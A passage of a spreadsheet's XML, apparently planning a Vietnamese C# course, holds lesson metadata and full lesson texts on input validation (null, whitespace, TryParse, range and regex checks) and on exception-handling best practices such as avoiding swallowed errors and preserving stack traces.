          <t>Thấy một giá trị đi qua lần lượt 4 lớp kiểm tra và dừng ở lớp đầu tiên không đạt.</t>
        </is>
      </c>
      <c r="I27" s="10" t="inlineStr">
        <is>
          <t>1 cột, 5 tab theo giá trị đầu vào</t>
        </is>
      </c>
      <c r="J27" s="10" t="inlineStr">
        <is>
          <t>Dải 4 đèn kiểm tra nằm ngang: Có giá trị? → Không chỉ khoảng trắng? → Là số? (int.TryParse) → Trong khoảng 1–120? Đèn sáng xanh khi đạt, đỏ khi trượt, các đèn phía sau tắt. Thông báo lỗi tương ứng hiện dưới đèn đỏ.</t>
        </is>
      </c>
      <c r="K27" s="10" t="inlineStr">
        <is>
          <t>H09</t>
        </is>
      </c>
      <c r="L27" s="10" t="inlineStr">
        <is>
          <t>null | "   " | "abc" | "150" | "25"</t>
        </is>
      </c>
      <c r="M27" s="10" t="inlineStr">
        <is>
          <t>Mỗi tab đi qua các đèn theo thứ tự, mỗi đèn một bước.
null → trượt đèn 1: "Vui lòng nhập tuổi".
"   " → qua đèn 1, trượt đèn 2.
"abc" → qua đèn 1, 2; TryParse trả false → trượt đèn 3: "Tuổi phải là số".
"150" → qua 3 đèn đầu, trượt đèn 4: "Tuổi phải từ 1 đến 120".
"25" → 4 đèn xanh: hợp lệ.</t>
        </is>
      </c>
      <c r="N27" s="10" t="inlineStr">
        <is>
          <t>null, "   ", "abc", "150", "25"</t>
        </is>
      </c>
      <c r="O27" s="10" t="inlineStr">
        <is>
          <t>Kiểm tra theo thứ tự từ chung đến cụ thể, mỗi trường hợp một thông báo rõ ràng; dùng TryParse thay vì Parse + try-catch cho dữ liệu người dùng.</t>
        </is>
      </c>
      <c r="P27" s="10" t="inlineStr">
        <is>
          <t>string.IsNullOrWhiteSpace gộp được 2 kiểm tra đầu; mô phỏng tách riêng để dễ quan sát.</t>
        </is>
      </c>
      <c r="Q27" s="10" t="inlineStr">
        <is>
          <t>c-sharp-ung-dung/xu-ly-loi-va-ngoai-le-exception-handling-nang-cao/kiem-tra-va-xac-thuc-du-lieu-dau-vao/cac-ky-thuat-xac-thuc-du-lieu-kiem-tra-null-rong-dinh-dang-pham-vi/index.html</t>
        </is>
      </c>
      <c r="R27" s="10" t="inlineStr">
        <is>
          <t>https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/xu-ly-loi-va-ngoai-le-exception-handling-nang-cao/kiem-tra-va-xac-thuc-du-lieu-dau-vao/cac-ky-thuat-xac-thuc-du-lieu-kiem-tra-null-rong-dinh-dang-pham-vi/</t>
        </is>
      </c>
      <c r="S27" s="10" t="n"/>
      <c r="T27" s="12" t="n"/>
      <c r="U27" s="12" t="n"/>
      <c r="V27" s="21" t="inlineStr">
        <is>
          <t>Kiểm tra giá trị Null và Chuỗi rỗng
Một trong những bước xác thực dữ liệu cơ bản và quan trọng nhất là kiểm tra xem dữ liệu có bị thiếu hay không. Trong C#, điều này thường liên quan đến việc kiểm tra các giá trị null và chuỗi rỗng.
Kiểm tra giá trị Null
Giá trị null biểu thị rằng một biến tham chiếu (reference type) không trỏ đến bất kỳ đối tượng nào. Việc cố gắng truy cập thành viên của một đối tượng null sẽ dẫn đến NullReferenceException, một lỗi phổ biến và cần tránh.
Đối với các kiểu dữ liệu tham chiếu như string, object, hoặc các class tùy chỉnh, bạn nên luôn kiểm tra null trước khi sử dụng:
public void XuLyDuLieu(string tenNguoiDung, object duLieuPhucTap)
{
    if (tenNguoiDung == null)
    {
        Console.WriteLine("Tên người dùng không được để null.");
        return;
    }
    if (duLieuPhucTap == null)
    {
        Console.WriteLine("Dữ liệu phức tạp không được để null.");
        return;
    }
    // Nếu không null, tiếp tục xử lý
    Console.WriteLine($"Tên người dùng: {tenNguoiDung}");
    // ... xử lý duLieuPhucTap ...
}
Kiểm tra Chuỗi rỗng hoặc Khoảng trắng
Đối với kiểu string, ngoài null, chúng ta còn cần xem xét các trường hợp chuỗi rỗng ("") hoặc chuỗi chỉ chứa khoảng trắng (spaces, tabs, newlines). C# cung cấp các phương thức tiện lợi để xử lý các trường hợp này:
string.IsNullOrEmpty(string value): Trả về true nếu chuỗi là null hoặc là chuỗi rỗng ("").
string.IsNullOrWhiteSpace(string value): Trả về true nếu chuỗi là null, chuỗi rỗng, hoặc chỉ chứa các ký tự khoảng trắng. Đây thường là lựa chọn tốt hơn khi bạn muốn đảm bảo người dùng đã nhập một nội dung có ý nghĩa.
Ví dụ:
public void DangKyTaiKhoan(string email, string matKhau)
{
    if (string.IsNullOrWhiteSpace(email))
    {
        Console.WriteLine("Email không được để trống.");
        return;
    }
    if (string.IsNullOrWhiteSpace(matKhau))
    {
        Console.WriteLine("Mật khẩu không được để trống.");
        return;
    }
    // Nếu cả email và mật khẩu đều hợp lệ (không null/rỗng/khoảng trắng)
    Console.WriteLine($"Đăng ký tài khoản với email: {email} thành công.");
}
Kiểm tra phạm vi giá trị
Xác thực phạm vi giá trị đảm bảo rằng dữ liệu số hoặc ngày tháng nằm trong một khoảng hợp lệ được định nghĩa trước. Điều này rất quan trọng để duy trì tính toàn vẹn của dữ liệu và logic nghiệp vụ.
Phạm vi số
Kiểm tra phạm vi số thường áp dụng cho tuổi, số lượng, điểm số, v.v. Bạn có thể sử dụng các toán tử so sánh (&lt;, &gt;, &lt;=, &gt;=) để thực hiện việc này.
Ví dụ: Tuổi phải từ 18 đến 60, và số lượng sản phẩm phải là số dương.
public void DatHang(int tuoiNguoiMua, int soLuongSanPham)
{
    if (tuoiNguoiMua &lt; 18 || tuoiNguoiMua &gt; 60)
    {
        Console.WriteLine("Tuổi người mua phải từ 18 đến 60.");
        return;
    }
    if (soLuongSanPham &lt;= 0)
    {
        Console.WriteLine("Số lượng sản phẩm phải là số dương.");
        return;
    }
    Console.WriteLine($"Đặt hàng thành công: {soLuongSanPham} sản phẩm bởi người {tuoiNguoiMua} tuổi.");
}
Phạm vi ngày tháng
Đối với ngày tháng, bạn có thể kiểm tra xem một ngày có nằm trong quá khứ, tương lai hay một khoảng thời gian cụ thể hay không.
Ví dụ: Ngày sinh không thể ở trong tương lai, và ngày bắt đầu phải trước ngày kết thúc.
public void DatLichHop(DateTime ngaySinh, DateTime ngayBatDau, DateTime ngayKetThuc)
{
    if (ngaySinh &gt; DateTime.Today)
    {
        Console.WriteLine("Ngày sinh không thể ở trong tương lai.");
        return;
    }
    if (ngayBatDau &gt;= ngayKetThuc)
    {
        Console.WriteLine("Ngày bắt đầu phải trước ngày kết thúc.");
        return;
    }
    Console.WriteLine($"Lịch họp từ {ngayBatDau.ToShortDateString()} đến {ngayKetThuc.ToShortDateString()} đã được đặt.");
}
Xác thực định dạng cơ bản
Xác thực định dạng đảm bảo rằng dữ liệu đầu vào tuân thủ một cấu trúc cụ thể. Đối với các kiểu dữ liệu cơ bản như số nguyên (int), số thực (double), hoặc ngày tháng (DateTime), C# cung cấp các phương thức TryParse rất hiệu quả để kiểm tra và chuyển đổi dữ liệu mà không gây ra ngoại lệ.
Sử dụng TryParse
Thay vì sử dụng Parse (có thể ném FormatException nếu đầu vào không hợp lệ), TryParse sẽ trả về false và không ném ngoại lệ, giúp bạn xử lý lỗi một cách duyên dáng.
Ví dụ: Chuyển đổi chuỗi thành số nguyên hoặc ngày tháng.
public void XuLyDuLieuNhap(string chuoiSoLuong, string chuoiNgay)
{
    int soLuong;
    if (!int.TryParse(chuoiSoLuong, out soLuong))
    {
        Console.WriteLine($"'{chuoiSoLuong}' không phải là số lượng hợp lệ.");
        return;
    }
    Console.WriteLine($"Số lượng: {soLuong}");
    DateTime ngayNhap;
    if (!DateTime.TryParse(chuoiNgay, out ngayNhap))
    {
        Console.WriteLine($"'{chuoiNgay}' không phải là định dạng ngày tháng hợp lệ.");
        return;
    }
    Console.WriteLine($"Ngày nhập: {ngayNhap.ToShortDateString()}");
    // Nếu cả hai đều hợp lệ, tiếp tục xử lý
}
Sử dụng Biểu thức Chính quy (Regular Expressions) để xác thực định dạng phức tạp
Đối với các định dạng phức tạp hơn như email, số điện thoại, mã bưu chính, hoặc các ID có cấu trúc đặc biệt, việc sử dụng các phương thức kiểm tra chuỗi thông thường hoặc TryParse là không đủ. Trong những trường hợp này, Biểu thức Chính quy (Regular Expressions hay Regex) là một công cụ cực kỳ mạnh mẽ.
Biểu thức Chính quy là gì?
Biểu thức chính quy là một chuỗi ký tự đặc biệt định nghĩa một mẫu tìm kiếm. Bạn có thể sử dụng mẫu này để kiểm tra xem một chuỗi có khớp với một định dạng cụ thể hay không, hoặc để tìm kiếm và thay thế các phần của chuỗi.
Trong C#, bạn sử dụng namespace System.Text.RegularExpressions và lớp Regex.
Ví dụ về xác thực định dạng bằng Regex
1. Địa chỉ Email
Một địa chỉ email có cấu trúc khá phức tạp (user@domain.com). Dưới đây là một mẫu regex đơn giản để kiểm tra định dạng email cơ bản:
using System.Text.RegularExpressions;
public void KiemTraEmail(string email)
{
    // Mẫu regex cho email cơ bản (không hoàn hảo cho mọi trường hợp nhưng đủ dùng cho nhiều ứng dụng)
    string emailPattern = @"^[^@\s]+@[^@\s]+\.[^@\s]+$";
    if (Regex.IsMatch(email, emailPattern))
    {
        Console.WriteLine($"'{email}' là địa chỉ email hợp lệ.");
    }
    else
    {
        Console.WriteLine($"'{email}' không phải là địa chỉ email hợp lệ.");
    }
}
2. Số điện thoại
Số điện thoại có thể có nhiều định dạng tùy theo quốc gia. Ví dụ, một số điện thoại Việt Nam có thể bắt đầu bằng 0 và có 9-10 chữ số.
using System.Text.RegularExpressions;
public void KiemTraSoDienThoai(string soDienThoai)
{
    // Mẫu regex cho số điện thoại Việt Nam (0xxxxxxxx hoặc 0xxxxxxxxx)
    string phonePattern = @"^(0|\+84)\d{9,10}$";
    if (Regex.IsMatch(soDienThoai, phonePattern))
    {
        Console.WriteLine($"'{soDienThoai}' là số điện thoại hợp lệ.");
    }
    else
    {
        Console.WriteLine($"'{soDienThoai}' không phải là số điện thoại hợp lệ.");
    }
}
3. Mật khẩu mạnh
Regex cũng có thể được dùng để kiểm tra độ mạnh của mật khẩu (ví dụ: chứa ít nhất một chữ hoa, một chữ thường, một số, một ký tự đặc biệt và có độ dài tối thiểu).
using System.Text.RegularExpressions;
public void KiemTraMatKhauManh(string matKhau)
{
    // Mật khẩu phải có ít nhất 8 ký tự, chứa ít nhất 1 chữ hoa, 1 chữ thường, 1 số và 1 ký tự đặc biệt.
    string passwordPattern = @"^(?=.*[a-z])(?=.*[A-Z])(?=.*\d)(?=.*[^a-zA-Z\d]).{8,}$";
    if (Regex.IsMatch(matKhau, passwordPattern))
    {
        Console.WriteLine("Mật khẩu đủ mạnh.");
    }
    else
    {
        Console.WriteLine("Mật khẩu không đủ mạnh. Yêu cầu: ít nhất 8 ký tự, gồm chữ hoa, chữ thường, số và ký tự đặc biệt.");
    }
}
Biểu thức chính quy là một chủ đề rộng lớn và có thể trở nên rất phức tạp. Tuy nhiên, việc nắm vững các mẫu cơ bản và biết cách sử dụng Regex.IsMatch() trong C# sẽ giúp bạn xử lý hầu hết các yêu cầu xác thực định dạng trong ứng dụng của mình.</t>
        </is>
      </c>
      <c r="W27" s="22" t="inlineStr">
        <is>
          <t># Các kỹ thuật xác thực dữ liệu: Kiểm tra null, rỗng, định dạng, phạm vi
## Mục tiêu học tập
Sau bài học này, bạn có thể:
- Phân biệt bốn lớp kiểm tra: có giá trị (null), không rỗng, đúng định dạng và nằm trong phạm vi.
- Dùng `string.IsNullOrWhiteSpace` và `int.TryParse` đúng chỗ.
- Giải thích vì sao nên kiểm tra theo thứ tự từ chung đến cụ thể.
- Viết một hàm `Validate` trả về thông báo rõ ràng cho từng trường hợp sai.
- Quan sát một giá trị đi qua lần lượt bốn lớp kiểm tra và dừng ở lớp đầu tiên không đạt bằng hoạt động mô phỏng.
## Kiểm tra theo lớp
Dữ liệu người dùng nhập có thể sai theo nhiều kiểu: không có gì, chỉ toàn khoảng trắng, không phải số, hoặc là số nhưng vô lý. Mỗi kiểu sai cần một lớp kiểm tra riêng. Bài này dùng ví dụ nhập **tuổi** (hợp lệ từ 1 đến 120) và đi qua bốn lớp theo thứ tự:
| Lớp | Câu hỏi | Công cụ thường dùng |
|---|---|---|
| 1. Có giá trị | Dữ liệu có tồn tại không? | `== null` |
| 2. Không rỗng | Có chữ thật sự không? | `Trim()`, `string.IsNullOrWhiteSpace` |
| 3. Định dạng | Có đọc được thành số không? | `int.TryParse` |
| 4. Phạm vi | Số có nằm trong khoảng cho phép không? | `&lt;`, `&gt;`, `&lt;=`, `&gt;=` |
Thứ tự này đi **từ chung đến cụ thể**: chỉ khi lớp trước đạt thì lớp sau mới có ý nghĩa. Chẳng hạn không thể kiểm tra phạm vi nếu chưa chắc đó là số.
## Kiểm tra null và chuỗi rỗng
Giá trị `null` nghĩa là biến tham chiếu không trỏ tới đối tượng nào. Gọi phương thức trên `null` sẽ ném `NullReferenceException`, nên phải kiểm tra trước khi dùng.
Với chuỗi, ngoài `null` còn hai trường hợp nữa: chuỗi rỗng `""` và chuỗi chỉ có khoảng trắng như `"   "`. C# có sẵn hai phương thức tĩnh:
- `string.IsNullOrEmpty(s)`: `true` nếu `s` là `null` hoặc `""`.
- `string.IsNullOrWhiteSpace(s)`: `true` nếu `s` là `null`, `""` hoặc chỉ chứa khoảng trắng. Đây thường là lựa chọn tốt hơn khi cần người dùng nhập nội dung có nghĩa.
```csharp
using System;
public class Program
{
    public static void Main()
    {
        Console.WriteLine(string.IsNullOrWhiteSpace(null));   // True
        Console.WriteLine(string.IsNullOrWhiteSpace("   "));  // True
        Console.WriteLine(string.IsNullOrWhiteSpace("abc"));  // False
    }
}
```
## Kiểm tra định dạng với TryParse
Chuỗi `"abc"` không thể trở thành số. Nếu dùng `int.Parse`, bạn nhận ngay `FormatException`. Với dữ liệu người dùng nhập, sai là chuyện thường xuyên, nên dùng **`int.TryParse`**: nó trả về `true` hoặc `false` và không ném ngoại lệ. Kết quả số nằm ở tham số `out`.
```csharp
using System;
public class Program
{
    public static void Main()
    {
        if (int.TryParse("25", out int age))
        {
            Console.WriteLine(age);       // 25
        }
        bool ok = int.TryParse("abc", out int other);
        Console.WriteLine(ok);            // False
        Console.WriteLine(other);         // 0 (khi thất bại, giá trị out là 0)
    }
}
```
`DateTime.TryParse`, `double.TryParse` hoạt động tương tự cho ngày tháng và số thực.
## Kiểm tra phạm vi
Khi đã có số, kiểm tra nó nằm trong khoảng hợp lệ bằng các toán tử so sánh: tuổi từ 1 đến 120, số lượng phải dương, ngày sinh không được ở tương lai (`ngaySinh &gt; DateTime.Today` là sai).
## Ghép bốn lớp thành hàm Validate
```csharp
using System;
public class Program
{
    static string Validate(string? input)
    {
        if (input == null)
            return "Vui lòng nhập tuổi";
        if (input.Trim() == "")
            return "Không được để trống";
        if (!int.TryParse(input, out int age))
            return "Tuổi phải là số";
        if (age &lt; 1 || age &gt; 120)
            return "Tuổi phải từ 1 đến 120";
        return "Hợp lệ";
    }
    public static void Main()
    {
        Console.WriteLine(Validate(null));    // Vui lòng nhập tuổi
        Console.WriteLine(Validate("   "));   // Không được để trống
        Console.WriteLine(Validate("abc"));   // Tuổi phải là số
        Console.WriteLine(Validate("150"));   // Tuổi phải từ 1 đến 120
        Console.WriteLine(Validate("25"));    // Hợp lệ
    }
}
```
Mỗi lệnh `return` đặt ngay sau điều kiện sai nên hàm dừng ở lớp đầu tiên không đạt, và người dùng nhận đúng một thông báo cụ thể.
## Hoạt động: Bốn đèn kiểm tra
Mô phỏng dưới đây chạy hàm `Validate` ở trên với năm giá trị khác nhau. Bốn "đèn" tương ứng bốn lớp kiểm tra: **Có giá trị?**, **Không chỉ trắng?**, **Là số?**, **Trong 1-120?**. Hãy thao tác theo thứ tự sau, chọn từng tab rồi bấm **Bước tiếp** để chạy từng dòng:
- Mở tab **null**. Đèn 1 chuyển sang đỏ ngay vì `input` là `null`. Kết quả "Vui lòng nhập tuổi" hiện trong thẻ lỗi "Không hợp lệ", ba đèn còn lại không cần xét.
- Mở tab **"   "** (chỉ có khoảng trắng). Đèn 1 xanh vì chuỗi không phải `null`, nhưng đèn 2 đỏ vì `Trim()` cắt hết còn chuỗi rỗng. Kết quả: "Không được để trống".
- Mở tab **"abc"**. Đèn 1 và 2 xanh. `TryParse` trả về `false` nên đèn 3 đỏ, và `age` nhận 0. Kết quả: "Tuổi phải là số".
- Mở tab **"150"**. Ba đèn đầu xanh, `age` là 150. Đèn 4 đỏ vì ngoài khoảng 1-120. Kết quả: "Tuổi phải từ 1 đến 120".
- Mở tab **"25"**. Cả bốn đèn xanh, thẻ xanh "Hợp lệ" hiện dòng "Tuổi 25 được chấp nhận".
```
&lt;iframe src="https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/xu-ly-loi-va-ngoai-le-exception-handling-nang-cao/kiem-tra-va-xac-thuc-du-lieu-dau-vao/cac-ky-thuat-xac-thuc-du-lieu-kiem-tra-null-rong-dinh-dang-pham-vi/" title="Bốn lớp kiểm tra dữ liệu" style="border:0;" allowfullscreen&gt;&lt;/iframe&gt;
```
Điều rút ra: dữ liệu đi qua các lớp kiểm tra từ chung đến cụ thể và dừng ở lớp đầu tiên không đạt. Dùng `TryParse` thay cho `Parse` kèm `try-catch` với dữ liệu người dùng, vì sai là chuyện bình thường chứ không phải tình huống bất ngờ.
## Mở rộng: định dạng phức tạp với Regex
Với định dạng như email hay số điện thoại, `TryParse` không đủ. Khi đó dùng **biểu thức chính quy (Regular Expression, Regex)** trong `System.Text.RegularExpressions`:
```csharp
using System;
using System.Text.RegularExpressions;
public class Program
{
    public static void Main()
    {
        // Mẫu đơn giản: có phần trước @, phần sau @, và dấu chấm trong phần sau
        string pattern = @"^[^@\s]+@[^@\s]+\.[^@\s]+$";
        Console.WriteLine(Regex.IsMatch("an@x.com", pattern));  // True
        Console.WriteLine(Regex.IsMatch("an@x", pattern));      // False
    }
}
```
Lưu ý: mẫu trên chỉ kiểm tra hình dạng cơ bản, không bảo đảm email thật sự tồn tại. Regex là chủ đề rộng, hiện tại bạn chỉ cần biết `Regex.IsMatch` giúp kiểm tra nhanh một chuỗi có khớp mẫu hay không.
## Tóm tắt
- Kiểm tra theo bốn lớp: có giá trị, không rỗng, đúng định dạng, trong phạm vi.
- Thứ tự đi từ chung đến cụ thể; lớp trước không đạt thì dừng ngay.
- `string.IsNullOrWhiteSpace` gom kiểm tra `null`, rỗng và toàn khoảng trắng.
- Dùng `TryParse` thay cho `Parse` với dữ liệu người dùng để tránh ngoại lệ không cần thiết.
- Mỗi trường hợp sai nên có một thông báo rõ ràng; định dạng phức tạp thì dùng `Regex`.</t>
        </is>
      </c>
    </row>
    <row r="28" ht="409.6" customHeight="1" s="18">
      <c r="A28" s="10" t="n">
        <v>28</v>
      </c>
      <c r="B28" s="10" t="inlineStr">
        <is>
          <t>3. Xử lý lỗi và Ngoại lệ (Exception Handling) Nâng cao</t>
        </is>
      </c>
      <c r="C28" s="10" t="inlineStr">
        <is>
          <t>Thực hành Tổng hợp và Best Practices</t>
        </is>
      </c>
      <c r="D28" s="10" t="inlineStr">
        <is>
          <t>Các nguyên tắc vàng trong xử lý ngoại lệ</t>
        </is>
      </c>
      <c r="E28" s="10" t="inlineStr">
        <is>
          <t>Bài đọc</t>
        </is>
      </c>
      <c r="F28" s="13" t="inlineStr">
        <is>
          <t>Làm thêm nếu muốn</t>
        </is>
      </c>
      <c r="G28" s="16" t="inlineStr">
        <is>
          <t>Done</t>
        </is>
      </c>
      <c r="H28" s="10" t="inlineStr">
        <is>
          <t>Nhận ra 3 lỗi thực hành phổ biến và cách sửa, qua so sánh 'nên tránh' và 'nên làm'.</t>
        </is>
      </c>
      <c r="I28" s="10" t="inlineStr">
        <is>
          <t>2 cột song song (Nên tránh | Nên làm), 3 tab</t>
        </is>
      </c>
      <c r="J28" s="10" t="inlineStr">
        <is>
          <t>Cột trái viền đỏ, cột phải viền xanh. Hộp 'Thông tin lỗi còn lại' ở cuối mỗi cột cho thấy thông tin còn hay mất (stack trace đủ dòng hay bị cắt).</t>
        </is>
      </c>
      <c r="K28" s="10" t="inlineStr">
        <is>
          <t>H03, H07, H22</t>
        </is>
      </c>
      <c r="L28" s="10" t="inlineStr">
        <is>
          <t>Nuốt lỗi | throw ex và throw | Dùng exception cho luồng thường</t>
        </is>
      </c>
      <c r="M28" s="10" t="inlineStr">
        <is>
          <t>Nuốt lỗi: trái catch { } rỗng → lỗi biến mất, tổng tiền ra 0 mà không ai biết; phải ghi log rồi báo lỗi.
throw ex và throw: lỗi gốc ở ParseQuantity; trái 'throw ex;' → stack trace bắt đầu từ hàm có catch (mất dòng gốc); phải 'throw;' → giữ dòng ParseQuantity.
Luồng thường: đọc 1.000 dòng, 300 dòng sai. Trái int.Parse trong try-catch → 300 exception được ném; phải int.TryParse → 0 exception. Ô đếm 'Số exception đã ném'.
Bước cuối mỗi tab: nguyên tắc rút ra.</t>
        </is>
      </c>
      <c r="N28" s="10" t="inlineStr">
        <is>
          <t>Dữ liệu cố định từng tab</t>
        </is>
      </c>
      <c r="O28" s="10" t="inlineStr">
        <is>
          <t>Không nuốt lỗi; ném lại bằng throw; để giữ stack trace; dùng TryParse cho dữ liệu có thể sai thay vì dựa vào exception.</t>
        </is>
      </c>
      <c r="P28" s="10" t="inlineStr">
        <is>
          <t>'throw ex;' đặt lại stack trace về vị trí ném lại; 'throw;' giữ nguyên. Không nêu số mili giây cụ thể về hiệu năng (phụ thuộc máy).</t>
        </is>
      </c>
      <c r="Q28" s="10" t="inlineStr">
        <is>
          <t>c-sharp-ung-dung/xu-ly-loi-va-ngoai-le-exception-handling-nang-cao/thuc-hanh-tong-hop-va-best-practices/cac-nguyen-tac-vang-trong-xu-ly-ngoai-le/index.html</t>
        </is>
      </c>
      <c r="R28" s="10" t="inlineStr">
        <is>
          <t>https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/xu-ly-loi-va-ngoai-le-exception-handling-nang-cao/thuc-hanh-tong-hop-va-best-practices/cac-nguyen-tac-vang-trong-xu-ly-ngoai-le/</t>
        </is>
      </c>
      <c r="S28" s="10" t="n"/>
      <c r="T28" s="12" t="n"/>
      <c r="U28" s="12" t="n"/>
      <c r="V28" s="21" t="inlineStr">
        <is>
          <t>Các Nguyên Tắc Vàng Trong Xử Lý Ngoại Lệ
Xử lý ngoại lệ hiệu quả là một nghệ thuật, đòi hỏi sự cân nhắc kỹ lưỡng để đảm bảo ứng dụng của bạn không chỉ ổn định mà còn dễ bảo trì và gỡ lỗi. Trong bài đọc này, chúng ta sẽ đi sâu vào các nguyên tắc cốt lõi giúp bạn xây dựng một chiến lược xử lý ngoại lệ vững chắc trong C#.
Khi Nào Nên Bắt Ngoại Lệ và Khi Nào Nên Để Ngoại Lệ Lan Truyền
Một trong những quyết định quan trọng nhất khi xử lý ngoại lệ là liệu bạn có nên bắt (catch) một ngoại lệ tại điểm nó phát sinh hay để nó lan truyền (propagate) lên các tầng gọi cao hơn.
Khi nào nên bắt ngoại lệ:
Có thể xử lý một cách có ý nghĩa: Bắt ngoại lệ khi bạn có thể phục hồi từ lỗi, thử lại thao tác, cung cấp giá trị mặc định, hoặc chuyển đổi lỗi thành một trạng thái có thể quản lý được.
try
{
    // Thử đọc file
    string content = File.ReadAllText("data.txt");
    Console.WriteLine(content);
}
catch (FileNotFoundException ex)
{
    // Có thể xử lý: tạo file mới hoặc thông báo cho người dùng
    Console.WriteLine($"File không tìm thấy: {ex.Message}. Tạo file mới.");
    File.WriteAllText("data.txt", "Nội dung mặc định");
}
Chuyển đổi ngoại lệ: Đôi khi, một ngoại lệ cấp thấp (ví dụ: SqlException) cần được chuyển đổi thành một ngoại lệ cấp cao hơn, có ý nghĩa hơn cho tầng nghiệp vụ (ví dụ: DataAccessException). Điều này giúp ẩn đi chi tiết triển khai và cung cấp một API xử lý lỗi rõ ràng hơn.
Tại ranh giới ứng dụng: Ở các điểm vào/ra của ứng dụng (ví dụ: UI, API REST), bạn nên bắt các ngoại lệ không mong muốn để hiển thị thông báo thân thiện cho người dùng hoặc trả về phản hồi lỗi có cấu trúc, thay vì để ứng dụng crash.
Đảm bảo tài nguyên được giải phóng: Sử dụng khối finally hoặc câu lệnh using để đảm bảo các tài nguyên (file, kết nối cơ sở dữ liệu) được đóng hoặc giải phóng, ngay cả khi có ngoại lệ xảy ra.
Khi nào nên để ngoại lệ lan truyền:
Không thể xử lý tại điểm hiện tại: Nếu bạn không biết cách xử lý ngoại lệ một cách có ý nghĩa ở vị trí hiện tại, hãy để nó lan truyền lên để một tầng cao hơn có ngữ cảnh tốt hơn để xử lý.
Lỗi lập trình không thể phục hồi: Các lỗi như NullReferenceException, IndexOutOfRangeException thường là dấu hiệu của lỗi lập trình. Để chúng lan truyền giúp phát hiện và sửa lỗi sớm trong quá trình phát triển. Việc "nuốt" những ngoại lệ này có thể che giấu vấn đề và dẫn đến hành vi không mong muốn sau này.
Tránh "nuốt" ngoại lệ: Đừng bắt một ngoại lệ chỉ để ghi log rồi bỏ qua nó mà không có hành động xử lý nào khác. Điều này thường dẫn đến các lỗi khó debug sau này.
Tránh Bắt Ngoại Lệ Chung Chung (Catch-All) Nếu Không Có Lý Do Cụ Thể
Việc sử dụng catch (Exception ex) (thường được gọi là "catch-all") là một thực hành cần được xem xét cẩn thận. Mặc dù nó có vẻ an toàn vì bắt được mọi thứ, nhưng nó tiềm ẩn nhiều rủi ro.
Tại sao nên tránh catch (Exception ex):
Che giấu lỗi lập trình: Nó sẽ bắt cả các ngoại lệ nghiêm trọng như OutOfMemoryException, StackOverflowException, NullReferenceException – những lỗi thường chỉ ra một vấn đề cốt lõi trong mã của bạn. Việc bắt và không xử lý đúng cách những lỗi này có thể dẫn đến trạng thái ứng dụng không ổn định.
Khó gỡ lỗi: Khi bạn bắt mọi loại ngoại lệ, bạn không biết chính xác loại lỗi nào đã xảy ra, làm cho việc tìm nguyên nhân gốc rễ trở nên khó khăn hơn nhiều.
Xử lý lỗi không chính xác: Rất khó để có một logic xử lý chung phù hợp cho tất cả các loại ngoại lệ. Bạn có thể vô tình xử lý sai một loại lỗi cụ thể.
Khi nào catch (Exception ex) có thể chấp nhận được (với sự thận trọng):
Tại ranh giới cao nhất của ứng dụng: Ví dụ, trong một handler ngoại lệ toàn cục của ứng dụng web, dịch vụ, hoặc ứng dụng desktop. Mục tiêu ở đây là để ngăn chặn ứng dụng crash hoàn toàn, ghi log lỗi chi tiết, và hiển thị một thông báo lỗi chung, thân thiện cho người dùng.
// Ví dụ trong một Global Exception Handler
public void Configure(IApplicationBuilder app)
{
    app.UseExceptionHandler(errorApp =&gt;
    {
        errorApp.Run(async context =&gt;
        {
            context.Response.StatusCode = (int)HttpStatusCode.InternalServerError;
            context.Response.ContentType = "application/json";
            var exceptionHandlerPathFeature = context.Features.Get&lt;IExceptionHandlerPathFeature&gt;();
            var exception = exceptionHandlerPathFeature?.Error;
            if (exception != null)
            {
                // Ghi log chi tiết ngoại lệ tại đây
                // _logger.LogError(exception, "An unhandled exception occurred.");
                await context.Response.WriteAsJsonAsync(new { Error = "Đã xảy ra lỗi không mong muốn. Vui lòng thử lại sau." });
            }
        });
    });
    // ... các middleware khác
}
Khi bạn muốn ghi log tất cả các ngoại lệ không mong muốn: Đôi khi bạn muốn đảm bảo mọi ngoại lệ không được xử lý đều được ghi log trước khi lan truyền tiếp hoặc được xử lý bởi một cơ chế khác.
Nguyên tắc chung là chỉ bắt các loại ngoại lệ cụ thể mà bạn biết cách xử lý. Nếu bạn không biết cách xử lý một loại ngoại lệ, hãy để nó lan truyền.
Ghi Log Ngoại Lệ Một Cách Hiệu Quả
Ghi log là cầu nối giữa việc phát hiện lỗi trong môi trường phát triển và giám sát lỗi trong môi trường sản phẩm. Ghi log ngoại lệ hiệu quả là rất quan trọng để gỡ lỗi và duy trì ứng dụng.
Những gì cần ghi log:
Loại ngoại lệ: Tên đầy đủ của lớp ngoại lệ (ví dụ: System.IO.FileNotFoundException).
Thông báo ngoại lệ:ex.Message – mô tả ngắn gọn về lỗi.
Stack Trace:ex.StackTrace – thông tin quan trọng nhất, cho biết chính xác dòng code nào đã gây ra lỗi và chuỗi các cuộc gọi phương thức dẫn đến đó.
Inner Exception:ex.InnerException – nếu có, nó cung cấp nguyên nhân gốc rễ của ngoại lệ hiện tại. Luôn đi sâu vào chuỗi InnerException để ghi log toàn bộ.
Dữ liệu ngữ cảnh: Bất kỳ thông tin nào liên quan có thể giúp tái tạo hoặc hiểu lỗi, chẳng hạn như:
Các giá trị tham số đầu vào của phương thức.
ID người dùng hiện tại, ID giao dịch.
Tên file, đường dẫn, URL liên quan.
Trạng thái của các đối tượng quan trọng.
Cấp độ log: Sử dụng cấp độ log phù hợp (ví dụ: Error, Critical, Warning) để phân loại mức độ nghiêm trọng của vấn đề.
Cách ghi log:
Sử dụng thư viện logging chuyên dụng: Tránh Console.WriteLine hoặc Debug.WriteLine trong môi trường sản phẩm. Hãy sử dụng các thư viện logging mạnh mẽ như Serilog, NLog, log4net, hoặc các API logging tích hợp của .NET (ví dụ: ILogger trong ASP.NET Core).
Ghi log tại điểm xử lý: Ghi log ngoại lệ tại điểm mà nó được bắt và xử lý (hoặc tại điểm cao nhất của ứng dụng trước khi nó bị "nuốt" hoặc xử lý bởi một cơ chế toàn cục). Tránh ghi log cùng một ngoại lệ nhiều lần khi nó lan truyền qua các tầng để tránh làm đầy log một cách không cần thiết.
Bảo mật thông tin: Đảm bảo log không chứa thông tin nhạy cảm của người dùng hoặc dữ liệu bảo mật.
using Microsoft.Extensions.Logging; // Giả sử sử dụng ILogger
public class DataProcessor
{
    private readonly ILogger&lt;DataProcessor&gt; _logger;
    public DataProcessor(ILogger&lt;DataProcessor&gt; logger)
    {
        _logger = logger;
    }
